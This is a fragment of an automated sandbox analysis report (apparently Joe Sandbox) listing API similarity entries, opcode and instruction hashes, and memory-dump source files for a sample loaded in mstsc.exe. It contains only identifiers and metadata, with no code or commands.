                                                • API ID: AttributesFile
                                                • String ID:
                                                • API String ID: 3188754299-0
                                                • Opcode ID: d8724b8d1cf39537f1a6c20e4583a9cd2be8ec5f5b1839b0fe7ed1928af13ace
                                                • Instruction ID: fdbe8079c57570ea2be0637185b3d8eda70accffe2ea0335c9eb3435c7987dc3
                                                • Opcode Fuzzy Hash: d8724b8d1cf39537f1a6c20e4583a9cd2be8ec5f5b1839b0fe7ed1928af13ace
                                                • Instruction Fuzzy Hash: ACE0D83524020816EB246AAC9C41F6333485745724F0405B5FC2C8F2C1D97CE8414154
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3897347942.00000000044F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044F0000, based on PE: true
                                                 • Associated: 00000004.00000002.3897347942.0000000004619000.00000040.00001000.00020000.00000000.sdmp
                                                 • Associated: 00000004.00000002.3897347942.000000000461D000.00000040.00001000.00020000.00000000.sdmp
                                                 • Associated: 00000004.00000002.3897347942.000000000468E000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_44f0000_mstsc.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: d19266ece675ca2f06f594a44352a3a8cce9988517bae31eebc0201d3b1c881e
                                                • Instruction ID: 7a02658c73526911a238a3ae0a462727ca3f91a2922d9b695a40169f58f391fc
                                                • Opcode Fuzzy Hash: d19266ece675ca2f06f594a44352a3a8cce9988517bae31eebc0201d3b1c881e
                                                • Instruction Fuzzy Hash: 66B09B719015C5DAFB11F760560C71779407BD0715F19C071E2030741E4738D1D1F175